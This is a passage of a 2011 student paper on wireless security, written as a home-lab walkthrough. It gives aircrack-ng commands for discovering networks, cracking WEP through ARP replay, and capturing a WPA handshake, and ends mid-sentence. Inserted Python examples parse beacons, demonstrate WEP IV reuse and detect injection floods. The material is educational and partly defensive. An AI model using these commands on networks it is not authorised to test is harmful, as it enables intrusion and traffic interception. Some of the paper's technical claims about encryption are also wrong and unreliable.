
ITP 470

WIRELESS SECURITY
Independent Study
Ronnie Flathers
5/8/2011

Flathers - 2

Table of Contents
EXECUTIVE SUMMARY .................................................................................................................................. 4
DISCOVERY OF WIRELESS NETWORKS .......................................................................................................... 5
Active Scans .......................................................................................................................................... 5
Passive Scans ......................................................................................................................................... 5
Scanning Software ................................................................................................................................ 6
Avoiding Detection................................................................................................................................ 9
GAINING ACCESS ......................................................................................................................................... 10
CRACKING WEP ....................................................................................................................................... 11
Cracking Software ............................................................................................................................... 12
Capturing the IVs................................................................................................................................. 12
Packet Injection................................................................................................................................... 13
Cracking the key .................................................................................................................................. 15
Protecting the network ....................................................................................................................... 17
CRACKING WPA ....................................................................................................................................... 17
Capturing the handshake .................................................................................................................... 18
Forcing the handshake ........................................................................................................................ 19
Cracking the passphrase ..................................................................................................................... 20
Protecting the network ....................................................................................................................... 23
INFORMATION GATHERING ........................................................................................................................ 23
Passive scans ....................................................................................................................................... 23
Aggressive scans.................................................................................................................................. 24
Monitoring traffic ................................................................................................................................ 26
MAN IN THE MIDDLE ATTACKS ................................................................................................................... 26
ARP SPOOFING ........................................................................................................................................ 26
Spoofing Software ............................................................................................................................... 27
Advanced Software ............................................................................................................................. 28
ENCRYPTED TRAFFIC ............................................................................................................................... 29
SSL Encryption ..................................................................................................................................... 29
Fake Certificates .................................................................................................................................. 29
SSL Strip............................................................................................................................................... 31
Using SSLStrip...................................................................................................................................... 32

PROTECTING FROM MITM ATTACKS ...................................................................................................... 34
THE NEXT STEPS .......................................................................................................................................... 35
Metasploit ........................................................................................................................................... 35
Rogue APs ........................................................................................................................................... 36
CONCLUSION............................................................................................................................................... 36
SOURCES ..................................................................................................................................................... 38

Figure 1. Running Kismet ............................................................................................................... 8
Figure 2. Running airodump-ng ...................................................................................................... 9
Figure 3. Capturing Packets .......................................................................................................... 13
Figure 4. Injecting Packets ............................................................................................................ 15
Figure 5. Cracking the WEP Key ................................................................................................. 16
Figure 6. Waiting for WPA Handshake ........................................................................................ 18
Figure 7. Capturing Handshake After a DeAuth .......................................................................... 20
Figure 8. Dictionary Attack on WPA ........................................................................................... 21
Figure 9. Cracking WPA Key ....................................................................................................... 22
Figure 10. Passive Network Map .................................................................................................. 24
Figure 11. Active Network Map ................................................................................................... 25
Figure 12. ARP Spoofing .............................................................................................................. 27
Figure 13. Browser Warning......................................................................................................... 30
Figure 14. SSL Stripping .............................................................................................................. 33
Figure 15. Captured Passwords..................................................................................................... 34


EXECUTIVE SUMMARY
Over the past several months, I have been researching wireless networks and their security. I
started with a very basic understanding of Linux and wireless networks and a rough idea of what
I wanted to accomplish.
I created a scenario of a malicious hacker being within range of a private wireless network. My
goals were to:

- Discover the network and its relevant information
- Gain unauthorized access to the network
- Passively scan and sniff for valuable information

I envisioned a small business or a household using consumer level wireless products with limited
IT security knowledge. I wanted to see what kind of information an attacker would be able to
glean from the network while trying to remain hidden.
Through the course of my research and practice, I also kept in mind ways to defend against what
I was doing. In that sense, anyone who reads this paper should have a better understanding of
how to properly configure security on their wireless networks.
My Set Up. I modified my family's existing wireless network to suit my needs. We have AT&T
DSL internet which is connected to a Netgear Wireless N Router. This router broadcasts in
wireless N and b/g throughout our entire house. The signal is even capable of being picked up
several hundred feet outside of our house.
The model router is the RangeMax NEXT WNR854T. This is consumer level router designed for
households, but can also commonly be used in small businesses. For example, the Vagabond Inn
on Figueroa uses a similar Netgear Wireless-N router to provide free internet to all of its guests.
The router's IP address is 10.0.0.1 and the subnet is 10.0.0.1-255.
I set up a few victim machines which were connected to the network. These machines served
as the machines I directed my attacks towards. There were 2 virtual machines and one physical
laptop. The virtual machines were connected to the internet through a bridged connection with
the host. The operating system on each was:

- Windows 7 Ultimate (host)
- Windows XP with Service Pack 3 (virtual)
- Windows 2000 (virtual)

For the attacker's PC, I used another laptop that was running Backtrack 4 R2. Backtrack is a
Debian based Linux distribution that contains numerous security tools for all sorts of penetration
testing and analysis. All of the tools I used were included in Backtrack by default. It was
installed on an 8GB thumb drive that allowed persistent changes. The laptop was booted from
the thumb drive.
The last piece of hardware needed was an adequate wireless card. After attempting a few
techniques it became obvious that the wireless adapter built into the attack PC could not perform
some attacks. A card that supported packet injection was needed. This is explained later.
After some research on cards that had supported chipsets and worked well with Linux, I
purchased an ALFA AWUS036H wireless card. This came with a 3 foot USB cord and a 5 dB
antenna. This card used the Realtek chipset, which has great open source support and also allows
for packet injection. The card costs around $30 and was an excellent purchase.
Paper Organization. Below is the culmination of all that I learned about wireless security. It is
broken up into sequential steps, starting with the initial discovery of the wireless networks.
Screenshots and commands used accompany the descriptions.

DISCOVERY OF WIRELESS NETWORKS


The first step of any wireless attack is to identify the network you are attempting to access.
Sometimes, an attacker will know exactly which wireless network he wants to work on; other
times it is necessary to discover one. There are two different types of wireless
scans: active and passive scanning.
Active Scans. Active scanning occurs when either an Access Point (AP) or a client is actively
trying to discover the other. It can be directed to a specific network or client, or be general.
Wireless APs broadcast a packet called a beacon every tenth of a second. The purpose of these
beacons is specifically for clients to discover the AP. The beacon includes information about the
network, such as the SSID, MAC address of the AP, whether or not encryption is used, etc. A
client can also send out a directed probe looking for an AP, and wait for a response. When a
normal user conducts a scan for wireless networks in range using Windows or Mac, the operating
system is capturing these beacons and displaying the results. This is the most basic way of
discovering wireless networks. An attacker could simply use Windows to discover networks in
range while he slowly moves around a neighborhood. While reading beacons is generally good
enough for the average consumer to connect to their own home network or a public hot spot, they
are only useful if the network is set up to even be discovered. There are more efficient and
stealthier ways of detecting wireless networks.
Passive Scans. As opposed to active discovery, passive discovery involves reading packets and
deriving information from the packets. Passive scanners do not send out any beacons or probes,
but instead gather information from traffic that is already going on wirelessly. Passive scanning
will yield much greater results than active scanning. To passively scan, a wireless card must be put
into monitor mode.
Monitor mode for a wireless card is similar to promiscuous mode for a NIC. A card in monitor
mode will read every wireless packet it can reach and try to extrapolate data. Because all
wireless networks operate on the same frequency, the air is usually flooded with packets from
several different networks. The card picks up these packets and deduces what network they
belong to. This is different from reading only beacon or probe packets, because there is always
much more traffic than just those two types of packets.
Not all wireless cards support monitor mode. The chipset of the card must support the mode as
well as the driver being used.
There are several programs that utilize these passive scanning techniques. These programs use a
card in monitor mode to constantly read wireless packets. When a new network is discovered
(either through a beacon packet, or reading a normal data packet) the program displays all the
information it can about the network in range. These programs are extremely useful for not only
discovering the location of wireless networks, but also passively collecting important
information about the network. Without even connecting to the network, an attacker can use
these sniffing programs to discover pertinent information about the targets before making an
attack.
Scanning Software. Before scanning software can be used to its full potential, the wireless card
must be put into monitor mode. If monitor mode is available with the chipset and the driver, the
command to put the wireless interface (in this case wlan1) into monitor mode is:
# iwconfig wlan1 mode monitor

Another option is to use a program built into Backtrack, airmon-ng:
# airmon-ng start wlan1

This will put wlan1 into monitor mode and create a new monitor interface, usually mon0. This
interface will start reading all packets that it picks up. Once the wireless card is in monitor mode,
we are able to begin running a passive scan using the software of our choice.
Although passive scanning applications exist for both Windows and Mac, the best are available
on Linux. The gold standard of scanning software for Linux is a program called Kismet. Kismet
interfaces with all of the wireless cards on a system and logs lots of information in various
formats. It also does a nice job of graphically representing the networks it has discovered.
Backtrack includes the latest version of Kismet by default.
Kismet is used within the console in Backtrack Linux. It runs as a client/server application, so
the first time it is started it will prompt the user to start the Kismet server. The interface is then
used as the client. Most of the time, the client will be local, but it is possible to run the client
remotely.
Kismet will create several files in the directory that it is run, so it is best practice to create a new
directory each time Kismet is run. Name the directory something useful by including the date or
location that the scan was run. When Kismet is running, it displays information about all the
wireless networks that it finds in range and saves the data to files that can be read later or used by
other programs.
To create a dump directory and run Kismet:
# mkdir kismetscan0224
# cd kismetscan0224
# kismet

Select to start the Kismet server. The Kismet program runs entirely in the console. The ~ is
used to pull up menus, and Tab and Enter are used to move and select. If no interfaces are
automatically added, add the interface that was previously put into monitor mode, in this case,
wlan1 or mon0. After a few seconds, Kismet should begin to populate with wireless networks
that it discovers. It will list the name of the network (if it can determine it), the channel the
network is on, and the number of packets that it has read from that network. The sample output
in my scenario is:


Figure 1. Running Kismet (screenshot; annotation: "Target Network")

An attacker now has information about which wireless networks are in range and could be
capable of being attacked. In this example, we have identified our target flathers-n. It has a
strong signal strength and high traffic.
Another option besides Kismet for discovering wireless networks is to use a program included
with the aircrack-ng suite called airodump-ng. This program is used to capture packets and will
be used later on to crack security. However, it can also be used to list wireless networks in range
without capturing and saving any packets. Once again make sure the wireless card is in monitor
mode.
# airodump-ng wlan1

This will start reading packets and listing networks. It shows a little more text information on the
main screen than Kismet, although both are capable of extrapolating the same information. The
bottom portion of the screen also identifies clients that are sending and receiving packets,
important information for later in the attack.


Figure 2. Running airodump-ng (screenshot; annotation: "Target Network")

Avoiding Detection. As shown above, if an attacker is in range of a wireless network, it is
not a real challenge to discover it and find out information about it. Several programs make this
almost automatic. Avoiding active scanning is relatively simple, and usually good enough for
most consumers who are not concerned with high security. Since active scanners rely solely on
beacon packets sent from the AP, setting the access point to not include its SSID in its beacons
(beacons cannot be disabled entirely) is the simplest way to avoid detection. All consumer
wireless routers have this ability (it is usually called "Don't broadcast"). With this enabled, the
average consumer using the default networking programs on Windows or Mac will not discover
the wireless network. All network traffic will include a null value in place of the SSID. Clients
can still connect to the network if they know the actual SSID. Their active scanners can send
probes directed at the SSID, which the AP will by default respond to. This can also be
deactivated.
Unfortunately, this is not secure, and any smart attacker will be able to bypass this easily, and
actually use it to his or her advantage. Using passive scanning, an attacker will still be able to tell
that there is a wireless network in range, regardless if it is transmitting its SSID. In addition, for
legitimate clients to connect, they need to send a directed probe with the correct SSID. This is
easily intercepted and read by a passive scanning program. An attacker can even remotely
disconnect a legitimate user and then sniff the packet he sends to reconnect to get the SSID.
Disabling the broadcasting of the SSID on a router might make it a little more difficult for an
average user to discover or connect, but it really has no effect on a determined attacker.
There are no completely effective ways to avoid detection by a passive scanner. All it takes to be
discovered is to send one packet within range of a listening device. Some recommended ways to
lessen the probability of discovery are to use only Wireless-N, since most attackers will be looking
for B or G networks, or purchase foreign networking equipment that operates on a different
frequency than the standard. A determined attacker with the right equipment, however, will
always eventually be able to discover a wireless network.
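The following Python script is an added example; it is not part of the paper and not code from the Kismet or aircrack-ng projects. It parses an 802.11 beacon frame the way a passive scanner does (MAC header, fixed fields, then the tagged elements) so the effect of the "Don't broadcast" setting can be seen directly: the SSID element arrives empty, but the BSSID, channel and privacy/encryption information are still readable to anyone in monitor mode. Both beacon frames are constructed inline (no radiotap header; the BSSID is the one from the paper's screenshots), and the helper and function names are my own.

```python
"""Minimal 802.11 beacon parser (added example, not from the paper).
Assumes raw beacon frames with the 24-byte MAC header and no radiotap header,
which is what a capture tool hands over after stripping link-layer metadata."""
import struct

ELEMENT_SSID = 0
ELEMENT_DS_PARAMS = 3          # DS Parameter Set: carries the channel number
ELEMENT_RSN = 48               # RSN element: WPA2 (802.11i)
ELEMENT_VENDOR = 221
WPA_OUI_TYPE = b"\x00\x50\xf2\x01"   # Microsoft OUI, type 1 = WPA (pre-802.11i)
CAP_PRIVACY = 0x0010           # privacy bit in the capability field (WEP/WPA in use)


def parse_beacon(frame: bytes) -> dict:
    """Extract what airodump-ng/Kismet would show for one beacon."""
    if len(frame) < 36:
        raise ValueError("too short for a beacon")
    # Frame control byte 0: type 0 (management), subtype 8 (beacon) -> 0x80
    if (frame[0] & 0xFC) != 0x80:
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])      # address 3
    interval, capability = struct.unpack_from("<HH", frame, 32)  # after 8-byte timestamp
    info = {"bssid": bssid, "ssid": None, "hidden": False, "channel": None,
            "beacon_interval_tu": interval,
            "privacy": bool(capability & CAP_PRIVACY), "rsn": False, "wpa": False}
    pos = 36
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        data = frame[pos + 2:pos + 2 + length]
        if len(data) < length:
            break                       # truncated element: stop rather than guess
        if tag == ELEMENT_SSID:
            # "Don't broadcast" APs send a zero-length SSID or a run of null bytes
            if length == 0 or data == b"\x00" * length:
                info["hidden"], info["ssid"] = True, ""
            else:
                info["ssid"] = data.decode("utf-8", "replace")
        elif tag == ELEMENT_DS_PARAMS and length >= 1:
            info["channel"] = data[0]
        elif tag == ELEMENT_RSN:
            info["rsn"] = True
        elif tag == ELEMENT_VENDOR and data[:4] == WPA_OUI_TYPE:
            info["wpa"] = True
        pos += 2 + length
    return info


def security_label(info: dict) -> str:
    """Same classification a scanner prints in its ENC column."""
    if info["rsn"]:
        return "WPA2"
    if info["wpa"]:
        return "WPA"
    if info["privacy"]:
        return "WEP"
    return "OPEN"


def build_beacon(bssid: bytes, ssid: bytes, channel: int, privacy: bool, rsn: bool = False) -> bytes:
    """Construct a sample beacon for the demo (constructed data, not a real capture)."""
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    capability = (CAP_PRIVACY if privacy else 0) | 0x0001            # ESS bit
    fixed = struct.pack("<QHH", 0, 100, capability)                  # timestamp, 100 TU interval
    elements = bytes([ELEMENT_SSID, len(ssid)]) + ssid
    elements += bytes([ELEMENT_DS_PARAMS, 1, channel])
    if rsn:
        # RSN: version 1, group cipher CCMP, one pairwise CCMP, one AKM PSK, no capabilities
        body = bytes.fromhex("0100 000fac04 0100 000fac04 0100 000fac02 0000")
        elements += bytes([ELEMENT_RSN, len(body)]) + body
    return header + fixed + elements


if __name__ == "__main__":
    ap = bytes.fromhex("001b2fd52de6")             # BSSID from the paper's screenshots
    for frame in (build_beacon(ap, b"", 1, privacy=True),
                  build_beacon(ap, b"flathers-n", 1, privacy=True, rsn=True)):
        info = parse_beacon(frame)
        print(info["bssid"], info["channel"], repr(info["ssid"]),
              "hidden" if info["hidden"] else "visible", security_label(info))
```

The first beacon is what a "Don't broadcast" router emits: the SSID is gone, yet the BSSID, channel and the fact that encryption is in use are all still present, which is exactly why hiding the SSID does not hide the network from a passive scanner.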

GAINING ACCESS
Once a wireless network is discovered, the next step for an attacker is to connect to the network.
Connecting to the network allows the attacker to communicate with the AP and the connected
clients and also to sniff or see what information is being transferred. Although passive scanners
are able to detect packets and ascertain some basic information from intercepted packets, the
actual data in the packets is still encrypted. This is true even for wireless networks that do not
have any encryption methods in place. The data in a packet is designed only to be read by a
client that knows the SSID and has the encryption key (if any). To gain anything really valuable,
an attacker must connect to the network and associate his client with the AP.
The idea behind wireless encryption is that the initial authentication requires a passcode, and
then every single packet being transmitted between the WAP and the client carries a partial
passcode from then on. When the packet reaches its destination, the code is decrypted and
verified, which allows the packet to be read. The purpose of this is to not only bar unauthorized
users from connecting to the WAP, but also to make sure the packets are not read. Packets can be
intercepted as they travel across radio waves by clients that are not connected to the network.
Because of this, every packet needs to be encrypted while it is travelling.
If the network is unprotected, that is to say, has no encryption in place, any client is able to
connect to the network. Most public hot spots will allow any client within range that requests a
connection to connect. By default, this is how most consumer wireless routers are configured.
The priority of most consumer wireless router manufacturers is sadly ease of setup and use - not
security. Because of this, by default all security and encryption methods are turned off. This
enables a consumer to plug in the router to their existing internet connection and have an instant
wireless network. These routers also come with default SSIDs, usually the name of the company,
such as Linksys and NETGEAR. Although they include instructions, and sometimes
warnings, to enable security, many consumers do not follow them. Many, many, networks are
left completely open and accessible to anyone in range simply because consumers do not know
the risk they are taking.
The two most popular types of encryption for consumer wireless networks are Wireless
Equivalency Protocol (WEP) and WiFi Protected Access (WPA). The latter is much more secure
and recommended; however both are vulnerable to different types of attacks.

CRACKING WEP
With WEP there are two forms of authentication: open system and shared key. In open system
authentication any client can associate with the WAP. The client is authenticated regardless of
the key it possesses and begins to receive packets. The client would need the correct key at this
point to read the packets. In shared key, the client requests authentication and the WAP sends a
challenge text. The client encrypts the challenge text using the WEP key and sends the response
back. If it matches, then the WAP authenticates and associates with the client.
A WEP key is usually 128-bit, comprised of 26 hexadecimal digits, and a 24-bit Initialization
Vector (IV). Each packet is encrypted using the RC4 algorithm with the 26-hexadecimal-digit key
and a random IV. The packet is sent, along with the IV in plain text. The client then decrypts the
packet using the hex key and the included IV.
The weakness of WEP lies in the IV. It is sent as plaintext with the packet, which basically
means that anyone who grabs the packet can see the first 24 bits of the key that was used to encrypt it.
The RC4 encryption algorithm can only generate about 16 million different per-packet keys based on the
IV, meaning that if you gather enough of these IVs, you can crack the key. Also contributing to
WEP's weakness is the discovery that some of the IVs are weaker than others. Software can
recognize the weak IVs and use them to crack the key even quicker.
After the theory of how to crack WEP was proved possible, computer programs were written that
streamlined the process. There are two steps involved that the programs take. Once an encrypted
wireless network is found and the client is in range, it begins intercepting packets and logging
the IVs. The packets contain encrypted data and are worthless individually, but if enough IVs are
logged the code can be cracked. Usually about 50,000 IVs are needed to crack WEP. The
number of IVs traveling is related to network traffic, so if no one's on the network, it will take
days to get that many. If someone is downloading large files, it could just take hours or minutes.
Once enough IVs have been logged, the next step is to decrypt them and find the key. With
enough IVs, this process only takes seconds.
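To make the IV argument concrete, here is an added example in Python; it is not from the paper and not aircrack-ng's code. It implements textbook RC4 with the WEP per-packet key construction (3-byte IV followed by the 104-bit secret key) and shows the property that matters: two packets encrypted under the same IV share a keystream, so the XOR of their ciphertexts equals the XOR of their plaintexts, and one known plaintext exposes the other. It also computes the birthday bound for how soon IV repeats are expected in a 2^24 IV space. The key, IVs and plaintexts are constructed values, and no key recovery is performed.

```python
"""Why WEP's 24-bit IV is too small (added example, not from the paper).
Toy RC4 with WEP-style per-packet keys; all key and packet values are constructed."""


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Standard RC4: key-scheduling algorithm, then the pseudo-random generator."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP builds the RC4 key as IV (3 bytes, transmitted in the clear) || secret key.
    The same IV with the same secret key therefore always yields the same keystream."""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    keystream = rc4_keystream(iv + secret_key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, keystream))


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least two of `packets` randomly chosen
    IVs are identical. Exact product form; fine for a few thousand packets."""
    space = 2 ** iv_bits
    p_all_unique = 1.0
    for k in range(packets):
        p_all_unique *= (1 - k / space)
    return 1 - p_all_unique


if __name__ == "__main__":
    key = bytes.fromhex("0123456789abcdef0123456789")   # constructed 26-hex-digit (104-bit) key
    iv = b"\x00\x00\x01"                                 # constructed IV, reused by two packets
    p1 = b"GET /index.html "
    p2 = b"POST /login.php "
    c1 = wep_encrypt(key, iv, p1)
    c2 = wep_encrypt(key, iv, p2)
    # Keystream reuse: ciphertext XOR leaks plaintext XOR without knowing the key
    print("c1 ^ c2 == p1 ^ p2:", xor_bytes(c1, c2) == xor_bytes(p1, p2))
    # Knowing p1 recovers the keystream for this IV and hence p2
    print("recovered p2:", xor_bytes(xor_bytes(c1, p1), c2))
    print("IV space:", 2 ** 24)
    for n in (500, 5000, 10000):
        print(f"P(IV repeat) after {n} packets = {iv_collision_probability(n):.3f}")
```

The birthday figures explain the paper's observation that IV collection, not cryptanalysis, is the slow part: with roughly 16.8 million IVs, a repeat is more likely than not after only a few thousand packets, and a busy network or an injection-driven one produces that many in minutes.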
One method of speeding up the collection of IVs is through a certain type of packet injection.
Not every wireless card can support this, however. The type of packet injection used is called
ARP injection. With this technique, the wireless card sends out an ARP request to the access
point, which then responds with an ARP response. This response contains an IV, which is then
captured. This process is repeated rapidly to generate numerous IVs. To perform this injection,
the origin of the ARP request must be associated with the AP, or else the AP will not respond.
Software is able to spoof the origin to make the request look like it came from an associated
client, not from the attacker's computer.
Cracking Software. The most useful tool for cracking wireless security is a suite of programs
called aircrack-ng. This suite is included in Backtrack and contains all the tools necessary for
discovering and cracking wireless networks. Once a network has been identified through any
technique, the basic steps to crack a WEP encrypted network, and the programs used to
accomplish them are:
1) Begin capturing packets that contain unique IVs and save them to the disk (airodump-ng)
2) Inject ARP requests from an associated client to generate new packets (aireplay-ng)
3) Once enough IVs have been captured, run a cryptographic attack to decipher the WEP
key (aircrack-ng)
Capturing the IVs. In this case, the attacker has already identified the WEP encrypted network he
wants to crack using either Kismet or some other scanning technique. The information he will
need to start collecting IVs is the BSSID of the access point and the channel it is operating on.
When this information is known, the program airodump-ng is used to capture the IVs and save
them to a file. In this case, the BSSID of the network we are trying to crack is
00:1B:2F:D5:2D:E6, the channel is 1, the output file is flathers, and the interface is wlan1:
# airodump-ng --channel 1 --bssid 00:1B:2F:D5:2D:E6 --write flathers wlan1

The output will look like this as it is capturing:


Figure 3. Capturing Packets (screenshot; annotation: "Unique IVs")

Notice the column #Data. This is the number of unique IVs we have captured. To have a good
chance of cracking the passcode, we will need at least 35,000. The #/s column shows roughly
how many we are capturing each second. In a network with high traffic, this number will be
higher. The stations listed are the associated clients currently sending and receiving packets,
which will be needed to start packet injection.
The program needs to continue to run until it has captured a sufficient amount of IVs. At the rate
shown in the screenshot, this would take an extremely long time. To speed this up, we will use a
packet injection technique.
Packet Injection. While airodump-ng is running in the background, we can launch a new program
to start a packet injection technique called ARP replay. The goal of this is to dramatically
increase the #/s of data captured and decrease the amount of time needed to get all of the
necessary IVs. A program called aireplay-ng is capable of doing several injection attacks and
will be used to start the ARP replay.

Because an ARP request will only be responded to if the origin is from an associated client, we
need to use the address of one of the clients in our attack. Airodump-ng shows a list of connected
clients and their MAC addresses. In this case, there is one client connected and its address is
00:0F:66:7F:23:D9.
To perform an ARP replay attack, the wireless card must be capable of packet injection and it
must be within range of the AP. If the attacker is too far away, the ARP request packets he sends
will not be responded to. Aireplay-ng contains a simple test to see if injection is capable to the
BSSID of the AP:
# aireplay-ng --test -a 00:1B:2F:D5:2D:E6 wlan1

If the test is successful, then the card is able to inject packets and is within range of the AP. The
next step is to start the ARP replay attack. Aireplay-ng needs both the BSSID of the AP and the
MAC address of an associated client, which can be obtained from the client list in airodump-ng:
# aireplay-ng --arpreplay -h 00:0F:66:7F:23:D9 -b 00:1B:2F:D5:2D:E6 wlan1

Once the ARP replay starts working, aireplay-ng will flood the airwaves with ARP requests that
look like they are coming from the associated host. Each of these requests will provoke a
response from the AP which is then captured by airodump-ng running in the background. A
successful attack will look like this:


Figure 4. Injecting Packets (screenshot; annotation: "ARP Packet Injection")

The bottom screen shows aireplay-ng running. Airodump-ng is capturing the packets in the
background. Notice the #/s has increased dramatically. It is now only a matter of minutes before
enough IVs are captured.
Once 50,000 IVs are captured, there is a fifty percent chance that the WEP key will be able to be
cracked.
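From the defender's side, the attack just described leaves two loud signatures in the air: a burst of equal-sized encrypted data frames replayed from one station address far faster than any real client sends, and (when the attacker forces reconnections, as described in the Avoiding Detection section) a burst of deauthentication frames. The following Python detector is an added example, not part of the paper or of any wireless IDS; it buckets frame records into one-second windows per source MAC and flags both patterns. The frame records are constructed here as tuples (in practice they would be read from a monitor-mode capture such as the airodump-ng .cap files), the thresholds are my own assumptions, and the two MAC addresses are the ones from the paper's screenshots.

```python
"""Rate-based detector for ARP-replay floods and deauthentication bursts
(added example, not from the paper). Input records are constructed in-line."""
from collections import defaultdict

# Each record: (timestamp_seconds, source_mac, kind, length_bytes)
# kind is "data" for data frames or "deauth" for deauthentication frames.

DEAUTH_PER_SEC = 5     # assumed threshold: a healthy AP sends at most a handful per second
REPLAY_PER_SEC = 50    # assumed threshold: replay tools resend the same frame hundreds of times


def detect_anomalies(frames, deauth_threshold=DEAUTH_PER_SEC, replay_threshold=REPLAY_PER_SEC):
    """Bucket frames into 1-second windows per source MAC and flag floods.
    Returns a sorted list of (window_start, source_mac, reason, count)."""
    deauth_counts = defaultdict(int)                    # (window, src) -> count
    size_counts = defaultdict(lambda: defaultdict(int))  # (window, src) -> length -> count
    for ts, src, kind, length in frames:
        window = int(ts)
        if kind == "deauth":
            deauth_counts[(window, src)] += 1
        elif kind == "data":
            size_counts[(window, src)][length] += 1

    alerts = []
    for (window, src), n in deauth_counts.items():
        if n > deauth_threshold:
            alerts.append((window, src, "deauth flood", n))
    for (window, src), by_length in size_counts.items():
        # Replay signature: many frames of one identical size; real traffic varies in size
        length, n = max(by_length.items(), key=lambda item: item[1])
        if n > replay_threshold:
            alerts.append((window, src, f"possible ARP replay ({length}-byte frames)", n))
    return sorted(alerts)


def sample_capture():
    """Constructed sample: ten seconds of normal traffic, then bursts in second 10."""
    client = "00:0f:66:7f:23:d9"   # associated client address from the paper
    ap = "00:1b:2f:d5:2d:e6"       # AP BSSID from the paper
    frames = []
    # Normal browsing: a few frames per second, varied lengths, both directions
    for sec in range(10):
        for k in range(8):
            frames.append((sec + k / 8, client, "data", 90 + (k * 37) % 1400))
            frames.append((sec + k / 8 + 0.05, ap, "data", 120 + (k * 53) % 1400))
    # Replay burst: 300 identical 68-byte frames carrying the client's address in one second
    for k in range(300):
        frames.append((10 + k / 300, client, "data", 68))
    # Deauthentication burst carrying the AP's address, 25 frames in the same second
    for k in range(25):
        frames.append((10 + k / 25, ap, "deauth", 26))
    return frames


if __name__ == "__main__":
    for window, src, reason, count in detect_anomalies(sample_capture()):
        print(f"t={window}s src={src} {reason}: {count} frames")
```

A real deployment would feed this from a pcap reader and add a per-BSSID baseline rather than fixed thresholds, but even this form separates the ten quiet seconds from the injection second cleanly; the equal-size test is what distinguishes a replay from a legitimate large download, whose frame sizes vary.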
Cracking the key. All of the captured data packets containing IVs are stored in a file written by
airodump-ng. The program will write multiple files to the active directory in different formats. The
ones we are interested in are the *.cap files. The program used to read the IVs and crack the key
is called aircrack-ng. This program utilizes two different cryptographic techniques to extract the
key: FMS and PTW. The PTW method is more efficient but only works with captured ARP
responses. It is the default cryptographic attack for aircrack-ng. Because each packet is also
partially encrypted with the SSID, the BSSID of the network is also needed to decrypt the key.
To start the attack:
# aircrack-ng -b 00:1B:2F:D5:2D:E6 flathers*.cap

With over 70,000 IVs, it took less than 2 seconds to crack the passcode:

Figure 5. Cracking the WEP Key

This is the correct key and can now be used to connect to the network.
The entire process takes only a few minutes and the attacker now has the WEP passcode needed
to connect to the network and decrypt intercepted packets. However, this technique relies on
there being at least one associated client sending and receiving packets that airodump-ng can
capture. Sometimes, there may be no traffic on the network. For example, if an attacker is trying
this technique in the middle of the night when no machines are on, he will not be able to
intercept any packets. This makes it more challenging, but not impossible. The attacker needs to
artificially create traffic.
To accomplish this, the attacker would launch a fake authentication attack on the AP with his own
address. This tricks the AP into thinking that his address is associated with the AP. The next step
is to acquire and isolate an encrypted keystream from a packet sent from the AP. Aireplay-ng has
two methods for doing so, a fragmentation attack and a chopchop attack. Once the keystream
is isolated, it can be used to encrypt a fake ARP request. Once that fake packet is created, the
same ARP replay technique can be used as above.
This technique essentially tricks the AP into sending an encrypted beacon packet to the attacker.
He is then able to extract the keystream and use it to encrypt his own ARP packet. This
way, when he sends an ARP request back to the AP, it looks like it came from an associated
client that already has the passcode, since it is encrypted properly. Then the same steps are used
to crack the WEP key.
Protecting the network. Breaking WEP encryption is incredibly easy for even an inexperienced
attacker. Although it was the standard for several years, the techniques mentioned above have
proven it to be nearly useless. It is still the default encryption method for many wireless routers,
however. It does an adequate job of keeping out casual users who see that it has a password and
move on, but it does nothing against a determined attacker. The only secure advice
is not to use WEP at all. Any business or home that uses WEP and is concerned about security
should upgrade immediately to a more secure form of encryption, like WPA.

CRACKING WPA
After WEP was proven to be completely breakable, WPA became its successor. WPA uses a
much more advanced algorithm and does not have IVs. No amount of collected packets will
allow a computer to crack it. Most consumers use what is called WPA Personal, which relies on a
pre-shared key (PSK): a common key, shared across all devices, that is used for authentication.
When a client wants to associate with a WPA-encrypted network, a four-way handshake takes
place. Briefly, the client first seeks association with the AP. The AP sends the
client a piece of data, which the client encrypts using the passphrase, the SSID, and some other data.
The client sends this back to the AP along with another small piece of data, which the AP then encrypts. If
all of these keys match up, the AP installs the main key on the client, and the client is
successfully associated and able to decrypt the packets. The packets are encrypted with this key,
not the passcode. This exchange is known as the four-way handshake between a client and the AP.
Unlike WEP, there is not enough information contained in ordinary packets to find the key. No matter
how long an attacker sniffs the network and intercepts packets, he will never be able to crack the
passphrase. However, within the four-way handshake, there is enough information to brute-force
the passphrase.
The basic steps for cracking a WPA Personal encrypted network are:
1) Discover the network and be within range to intercept and inject packets
2) Start sniffing the network for the four way handshake and capture it when it arises
3) Wait for a new client to authenticate -OR- deauthenticate a current client
4) Brute force the captured handshake file with a dictionary file
Capturing the handshake. The four-way handshake occurs between the AP and a new client
every time a new client attempts to connect to the network. To capture the handshake, airodump-ng
must be configured to monitor the correct channel or SSID and to capture packets.
Assume the attacker has already found a WPA-encrypted network named flathers-n at BSSID
00:1B:2F:D5:2D:E6. To start airodump-ng capturing:
# airodump-ng --bssid 00:1B:2F:D5:2D:E6 -w flathers wlan1

This will start airodump-ng capturing every packet coming from that BSSID. Additionally, we
could tell airodump-ng to listen to all traffic on a specific channel for a four-way handshake,
regardless of the network. If a four-way handshake is discovered, the program will give a
notification and the handshake will be saved in a separate file. Note that this saves all the packets
transmitted, but all that is really needed is the handshake.

Figure 6. Waiting for WPA Handshake (callout: Target BSSID)

Airodump-ng is capturing packets from the flathers-n network and waiting for a four-way
handshake. When a handshake is captured, a notification will appear in the upper right hand
corner.
Forcing the handshake. Since a handshake is conducted every time a client tries to authenticate
with the AP, all that is needed is for somebody to connect to the network. In large networks
